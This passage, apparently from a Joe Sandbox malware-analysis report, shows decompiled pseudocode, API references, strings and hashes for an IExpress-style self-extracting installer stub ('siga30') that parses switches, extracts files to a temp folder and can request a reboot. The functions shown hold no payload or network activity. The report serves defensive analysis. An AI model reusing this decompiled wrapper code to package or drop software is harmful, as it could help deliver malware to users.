																}
															} else {
																_t202 = 0x5d;
																if(E0007667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x78a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00075C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x78b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x78a3a;
																}
																E00071680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0007658A(_t218, 0x104, 0x71140);
																if(E000731E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x78a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x78a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x78a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x78a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x78a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x79a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x79a2c =  *0x79a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x78d48 =  *0x78d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x79a2c =  *0x79a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x79a2c =  *0x79a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x78d48 =  *0x78d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x79a2c =  *0x79a2c | 0x00000004;
																										L70:
																										 *0x78a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x79a2c = 3;
																	 *0x78a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x78a2c != 0 &&  *0x78b3e == 0) {
						if(GetModuleFileNameA( *0x79a3c, 0x78b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E000766C8(0x78b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}

0x00075c9e
0x00075ca9
0x00075cb0
0x00075cb3
0x00075cb6
0x00075cb7
0x00075cb8
0x00075cbd
0x00076204
0x00075ccb
0x00000000
0x00075ccb
0x00075cd3
0x00075cd7
0x00075cf4
0x00000000
0x00075cf4
0x00075cf8
0x00075d00
0x00000000
0x00075d06
0x00075d06
0x00075d0e
0x00075d10
0x00075d12
0x00075d14
0x00075d15
0x00075d17
0x00075d49
0x00000000
0x00000000
0x00000000
0x00000000
0x00075d19
0x00075d19
0x00075d1d
0x00000000
0x00075d3f
0x00075d3f
0x00075d4b
0x00075d4b
0x00075d4f
0x00075d8d
0x00000000
0x00075d93
0x00075d93
0x00075d9a
0x00075d9d
0x00075d9e
0x00000000
0x00075d9e
0x00075d51
0x00075d5b
0x00075d72
0x000760fb
0x000760fb
0x00076207
0x0007620a
0x0007620b
0x0007620e
0x00076217
0x00075d78
0x00075d78
0x00075d80
0x00075d83
0x00075d84
0x00000000
0x00075d84
0x00075d5d
0x00075d5f
0x00075d62
0x00075d68
0x00075d64
0x00075d64
0x00075d64
0x00000000
0x00075d62
0x00075d5b
0x00075d4f
0x00075d1d
0x00000000
0x00075d9f
0x00075d9f
0x00075da5
0x00075dab
0x00075dba
0x00076218
0x0007621d
0x00076220
0x00076221
0x00076229
0x00076230
0x00076247
0x0007626a
0x00076272
0x00076249
0x00076255
0x0007625f
0x00076264
0x00076264
0x00076284
0x00075dc0
0x00075dc0
0x00075dca
0x00075e22
0x00000000
0x00000000
0x00000000
0x00000000
0x00075dcc
0x00075dce
0x00075e24
0x00075e24
0x00075e2c
0x00075e47
0x00075e4a
0x000761d2
0x000761e2
0x000761e7
0x000761ee
0x000761f1
0x000761f1
0x000761f8
0x000761f8
0x00075e50
0x00075e53
0x00076109
0x0007611f
0x00000000
0x00076125
0x00076137
0x0007613a
0x0007613c
0x0007613e
0x0007613e
0x00076141
0x00076141
0x00076143
0x00076144
0x0007614a
0x00000000
0x00076150
0x00076152
0x0007615c
0x00076170
0x00076172
0x0007617c
0x00076190
0x00076190
0x00076196
0x000761a5
0x00000000
0x000761ab
0x000761b9
0x000761c6
0x000761c6
0x0007617e
0x00076180
0x0007618a
0x00000000
0x00000000
0x00000000
0x00000000
0x0007618a
0x0007615e
0x00076160
0x0007616a
0x00000000
0x00000000
0x00000000
0x00000000
0x0007616a
0x0007615c
0x0007614a
0x0007610b
0x0007610e
0x0007610e
0x00000000
0x00075e59
0x00075e59
0x00075e5c
0x0007604f
0x00076056
0x00000000
0x0007605c
0x0007606e
0x00076071
0x00076073
0x00076075
0x00076075
0x00076078
0x00076078
0x0007607a
0x0007607b
0x00076081
0x00000000
0x00076087
0x00076087
0x0007608d
0x0007609c
0x00000000
0x000760a2
0x000760aa
0x000760b2
0x000760b7
0x000760bd
0x000760bf
0x000760bf
0x000760d6
0x000760e0
0x000760e7
0x000760f5
0x00000000
0x00000000
0x00000000
0x00000000
0x000760f5
0x0007609c
0x00076081
0x00075e62
0x00075e62
0x00075e65
0x00075fd3
0x00075fe9
0x00000000
0x00075fef
0x00075fef
0x00075ff7
0x00075ffd
0x00076003
0x00076006
0x00076011
0x00076014
0x0007603d
0x00076016
0x00076018
0x00076019
0x0007601b
0x00076033
0x0007601d
0x00076020
0x00076029
0x00076022
0x00076022
0x00076022
0x00076020
0x0007601b
0x00076042
0x00076044
0x00076046
0x0007604a
0x00075ff7
0x00075fd5
0x00075fd8
0x00075fd8
0x00000000
0x00075e6b
0x00075e6b
0x00075e6e
0x00075f8b
0x00075f99
0x00000000
0x00075f9f
0x00075fa7
0x00075faf
0x00000000
0x00075fb1
0x00075fb3
0x00000000
0x00075fb5
0x00075fb7
0x00000000
0x00075fb9
0x00000000
0x00075fb9
0x00075fb7
0x00075fb3
0x00075faf
0x00075f8d
0x00075f8d
0x00075f8d
0x00075f8f
0x00075fc1
0x00075fc1
0x00075fc1
0x00000000
0x00075e74
0x00075e74
0x00075e77
0x00075ea0
0x00075ebd
0x00075f79
0x00000000
0x00075f7f
0x00075ec3
0x00075ec3
0x00075ecc
0x00075ed4
0x00075ed6
0x00075edc
0x00075edf
0x00075eea
0x00075eed
0x00075f3f
0x00075f40
0x00000000
0x00075eef
0x00075eef
0x00075ef2
0x00075f34
0x00075ef4
0x00075ef4
0x00075ef7
0x00075f2b
0x00000000
0x00075ef9
0x00075ef9
0x00075efc
0x00075f22
0x00000000
0x00075efe
0x00075eff
0x00075f02
0x00075f16
0x00075f04
0x00075f07
0x00075f0d
0x00075f46
0x00075f46
0x00075f09
0x00075f09
0x00075f09
0x00075f07
0x00075f02
0x00075efc
0x00075ef7
0x00075ef2
0x00075f4c
0x00075f4e
0x00075f50
0x00075f54
0x00075ed4
0x00075ea2
0x00075ea4
0x00075eaf
0x00075eaf
0x00000000
0x00075e79
0x00075e7d
0x00000000
0x00075e83
0x00075e83
0x00075e83
0x00075e85
0x00075e85
0x00075e8e
0x00000000
0x00075e94
0x00000000
0x00075e94
0x00075e8e
0x00075e7d
0x00075e77
0x00075e6e
0x00075e65
0x00075e5c
0x00000000
0x00000000
0x00000000
0x00075dd0
0x00075dd0
0x00075dd0
0x00000000
0x00075dd0
0x00075dce
0x00075dca
0x00075dba
0x00000000
0x00075d00
0x00075dd9
0x00075e04
0x000761fe
0x00075e0a
0x00075e0c
0x00075e17
0x00075e17
0x00075e04
0x00076200
0x00076200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00075CEE
GetModuleFileNameA.KERNEL32(00078B3E,00000104,00000000,?,?), ref: 00075DFC
CharUpperA.USER32(?), ref: 00075E3E
CharUpperA.USER32(-00000052), ref: 00075EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00075F6F
CharUpperA.USER32(?), ref: 00075FA7
CharUpperA.USER32(-0000004E), ref: 00076008
CharUpperA.USER32(?), ref: 000760AA
CloseHandle.KERNEL32(00000000,00071140,00000000,00000040,00000000), ref: 000761F1
ExitProcess.KERNEL32 ref: 000761F8

Strings

RegServer, xrefs: 00075F66
", xrefs: 00075D78
:, xrefs: 00076118
", xrefs: 0007612D

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 82ed5d9e33969c5c4f85cce68085be35105747385222285c543adc0d8f04860e
Instruction ID: 9401c5bf9099d54dca98d41853ce5dfd50e9f4bc9eea88954766c4ce04b48999
Opcode Fuzzy Hash: 82ed5d9e33969c5c4f85cce68085be35105747385222285c543adc0d8f04860e
Instruction Fuzzy Hash: 5DD12A71E44E445EEBB58B388C483FA37E1A756302F14C0A9C48ED6191DAFD4EC28B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00071F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00071F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x79a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x78004; // 0xa87cf02e
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E000744B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00076CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E000744B9(0, 0x522, 0x71140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00071EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00071f90
0x00071f90
0x00071f93
0x00071f98
0x00071fa4
0x00071fa7
0x00071fc5
0x00071fcd
0x00071fdb
0x00071ee5
0x00071eea
0x00071ef1
0x00071ef4
0x00071f0c
0x00071f2e
0x00071f3a
0x00071f46
0x00071f4d
0x00071f58
0x00071f60
0x00071f61
0x00071f62
0x00071f75
0x00071f80
0x00071f77
0x00071f77
0x00000000
0x00071f77
0x00071f64
0x00071f64
0x00000000
0x00071f64
0x00071f0e
0x00071f0e
0x00071f13
0x00071f13
0x00071f14
0x00071f14
0x00071f16
0x00071f17
0x00071f1a
0x00071f1f
0x00071f1f
0x00071f86
0x00071f8f
0x00071fcf
0x00071fd3
0x00000000
0x00071fd3
0x00071fa9
0x00071fb4
0x00071fbb
0x00071fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00071fc3
0x00071f9a
0x00071f9a
0x00071fa2
0x00071fd9
0x00071fda
0x00000000
0x00000000
0x00000000
0x00071fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00071EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00071F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00071FD3

Strings

SeShutdownPrivilege, xrefs: 00071F28

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: ac2b29dd8523dcf595a8fbbb07a93bd8cdd4232994ec737b563371f35dafca58
Instruction ID: be8e0f16b794ee8ca1d255b0d0555a7fc50c0a3ac778b5c2ac485650fbda1f03
Opcode Fuzzy Hash: ac2b29dd8523dcf595a8fbbb07a93bd8cdd4232994ec737b563371f35dafca58
Instruction Fuzzy Hash: 1821DB71F4020576EB305BA99C49FFF76B8EBC6711F108428FA0DE61C1D77D88419269

Uniqueness

Uniqueness Score: -1.00%

Function 00076CF0 Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00076CF0(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00076cf7
0x00076d00
0x00076d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00076E26,00071000), ref: 00076CF7
UnhandledExceptionFilter.KERNEL32(00076E26,?,00076E26,00071000), ref: 00076D00
GetCurrentProcess.KERNEL32(C0000409,?,00076E26,00071000), ref: 00076D0B
TerminateProcess.KERNEL32(00000000,?,00076E26,00071000), ref: 00076D12

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: e101a1e3bd1d9492d3d644964d3572555a1e1cf82691098618a223d46d6f5435
Instruction ID: d31e842ebe437e7cd96095ce5a62cd2fee2f52161bca420c59d97237e4f8cf0b
Opcode Fuzzy Hash: e101a1e3bd1d9492d3d644964d3572555a1e1cf82691098618a223d46d6f5435
Instruction Fuzzy Hash: 05D0C932A00108BBFB002BE1EC0CA5D3F28EBCA222F844000F31DA2420CA3E5491CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00073210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00073210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E000743D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "siga30");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x79a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x791e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E000744B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x791e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x791e5 - 3;
						if(_t49 - 0x791e5 < 3) {
							goto L32;
						}
						_t24 =  *0x791e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x791e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0007658A(0x791e4, 0x104, 0x71140);
								_t27 = E000758C8(0x791e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x791e4 - 0x5c;
									if( *0x791e4 != 0x5c) {
										L30:
										_t30 = E0007597D(0x791e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x791e5 - 0x5c;
									if( *0x791e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E000744B9(_t64, 0x54a, 0x791e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x791e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x791e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x791e4 - 0x5c;
						if( *0x791e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x79124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x79a3c, 0x3e8, 0x78598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00074224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x787a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E000744B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0007321b
0x0007321e
0x00073221
0x0007343c
0x0007343e
0x0007343f
0x00073445
0x00073447
0x00000000
0x00073447
0x00073229
0x0007322a
0x0007322f
0x000733ec
0x000733f7
0x00073410
0x00073416
0x0007341d
0x0007342d
0x0007342d
0x00073438
0x00000000
0x00073438
0x00073237
0x00073243
0x00073243
0x00073246
0x000732ee
0x000732f4
0x000732f6
0x000733d4
0x000733d6
0x000733db
0x000733dc
0x000733de
0x000733df
0x00073370
0x00073372
0x00000000
0x00073372
0x000732fc
0x00073301
0x00073301
0x00073303
0x00073304
0x00073304
0x0007330a
0x0007330d
0x00000000
0x00000000
0x00073313
0x00073318
0x0007331a
0x00073331
0x00073332
0x0007333a
0x0007333d
0x0007337c
0x00073388
0x0007338f
0x00073394
0x00073396
0x000733a4
0x000733ab
0x000733b6
0x000733be
0x000733c3
0x000733c5
0x00073435
0x00073437
0x00073437
0x00000000
0x00073437
0x000733c7
0x000733c9
0x000733cc
0x00000000
0x000733cc
0x000733ad
0x000733b4
0x00000000
0x00000000
0x00000000
0x000733b4
0x00073398
0x00073399
0x0007339b
0x0007339c
0x0007339d
0x00000000
0x0007339d
0x0007334c
0x00073351
0x00073354
0x00000000
0x00000000
0x0007335c
0x00073362
0x00073364
0x00000000
0x00000000
0x00073366
0x00073367
0x00073369
0x0007336a
0x0007336b
0x00000000
0x0007336b
0x0007331c
0x00073323
0x00000000
0x00000000
0x00073329
0x0007332b
0x00000000
0x00000000
0x00000000
0x0007332b
0x0007324c
0x0007324c
0x0007324f
0x000732c8
0x000732ce
0x00000000
0x000732ce
0x00073251
0x00073256
0x00000000
0x00000000
0x00073271
0x00073277
0x00073279
0x00073298
0x0007329d
0x0007329f
0x00000000
0x00000000
0x000732b0
0x000732b6
0x000732b8
0x00000000
0x00000000
0x000732be
0x00073280
0x00073289
0x0007328e
0x00000000
0x0007328e
0x0007327b
0x00000000
0x0007327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00078598,00000200), ref: 00073271
GetDesktopWindow.USER32 ref: 000733E2
SetWindowTextA.USER32(?,siga30), ref: 000733F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00073410
GetDlgItem.USER32(?,00000836), ref: 00073426
EnableWindow.USER32(00000000), ref: 0007342D
EndDialog.USER32(?,00000000), ref: 0007343F

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 000732E2, 000732E7, 00073331, 00073344, 0007335B, 0007336A
siga30, xrefs: 000733F1

Memory Dump Source

Source File: 00000001.00000002.312910074.0000000000071000.00000020.00000001.01000000.00000004.sdmp, Offset: 00070000, based on PE: true

Associated: 00000001.00000002.312903122.0000000000070000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312921480.0000000000078000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.312928387.000000000007C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70000_niba6073.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$siga30
API String ID: 2418873061-2597203449
Opcode ID: 86532b42020693e00423db6acc5e498b20ff58eb6b1228e8c565b61d00795af1
Instruction ID: 3180431b8d3b3942109ae52e8805b9c89f423a229b5b99856681c7ee0e9ade52
Opcode Fuzzy Hash: 86532b42020693e00423db6acc5e498b20ff58eb6b1228e8c565b61d00795af1
Instruction Fuzzy Hash: E3513770F8124076FB751B355C8CFBF2A88DB86B51F50C028F64DB61C1CAAC9B42B269

Uniqueness

Uniqueness Score: -1.00%

Function 00072CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00072CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x78004; // 0xa87cf02e
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x79a3c = __ecx;
				memset(0x79140, 0, 0x8fc);
				memset(0x78a20, 0, 0x32c);
				memset(0x788c0, 0, 0x104);
				 *0x793ec = 1;
				_t20 = E0007468F("TITLE", 0x79154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x7858c = _t27;
					SetEvent(_t27);
					_t64 = 0x79a34;
					if(E0007468F("EXTRACTOPT", 0x79a34, 4) != 0) {
						if(( *0x79a34 & 0x000000c0) == 0) {
							L12:
							 *0x79120 =  *0x79120 & _t65;
							if(E00075C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x78a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x78184 != 0) {
										__imp__#17();
									}
									if( *0x78a24 == 0) {
										_t57 = _t65;
										if(E000736EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x79a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x79a34 & 0x00000100) == 0 || ( *0x78a38 & 0x00000001) != 0 || E000718A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00076517(_t57, 0x7d6, _t34, E000719E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00072390(0x78a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E000744B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0007468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x78588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x79a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E000744B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E000744B9(0, 0x54b, "siga30", 0, 0x10, 0);
										L11:
										CloseHandle( *0x78588);
										 *0x79124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E000744B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x79124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
